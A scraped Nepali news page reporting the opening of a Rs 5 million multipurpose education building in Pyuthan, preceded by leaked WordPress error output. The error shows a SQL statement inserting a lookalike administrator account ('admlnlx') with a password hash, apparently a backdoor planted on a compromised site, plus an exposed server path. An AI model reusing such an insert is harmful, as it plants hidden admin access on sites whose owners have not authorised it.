WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bz37NQD0gWydnS4MFFMTnanPt93Rty1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-04 18:30:39', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
पचास लाखमा शैक्षिक भवन निर्माण – Gaule Khabar

पचास लाखमा शैक्षिक भवन निर्माण

पचास लाखमा शैक्षिक भवन निर्माण

प्यूठान, माघ ११-

शिक्षक महासङ्घ तथा शिक्षा सम्बन्धी सरोकारवालाको संयुक्त पहलमा करिब रु ५० लाखकोलागतमा बहुउद्देश्य शैक्षिक भवन निर्माण गरिएको छ ।

शिक्षकको तालिम, सम्मेलन तथा शिक्षासम्बन्धी विभिन्न गतिविधि सञ्चालन गर्नका लागि उक्त भवन निर्माण गरिएको हो । शिक्षकको छाता सङ्गठन शिक्षक महासङ्घको अग्रसरतामा निर्माण भएको सो भवनका लागि जिल्ला शिक्षा कार्यालय, जिल्लाका उच्च मावि, माध्यमिक र निम्नमाध्यमिक विद्यालय, परीक्षा समिति, स्रोत केन्द्रलगायतले आर्थिक सहयोग गरेका शिक्षक महासङ्घका जिल्ला अध्यक्ष शेरबहादुर थापाले जानकारी दिनुभयो ।

सो भवनको आज एक कार्यक्रमका बीच उद्घाटन गरिएको छ । कार्यक्रममा नेपाल शिक्षक महासङ्घका केन्द्रीय अध्यक्ष केशव निरौलाले शिक्षा गुणस्तरीय भएमात्रै देशमा दक्ष जनशक्ति उत्पादन हुने बताउनुभयो । उहाँले सरकारले शिक्षामा पर्याप्त लगानी गर्नुपर्नेमा जोड दिनुभयो ।- रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका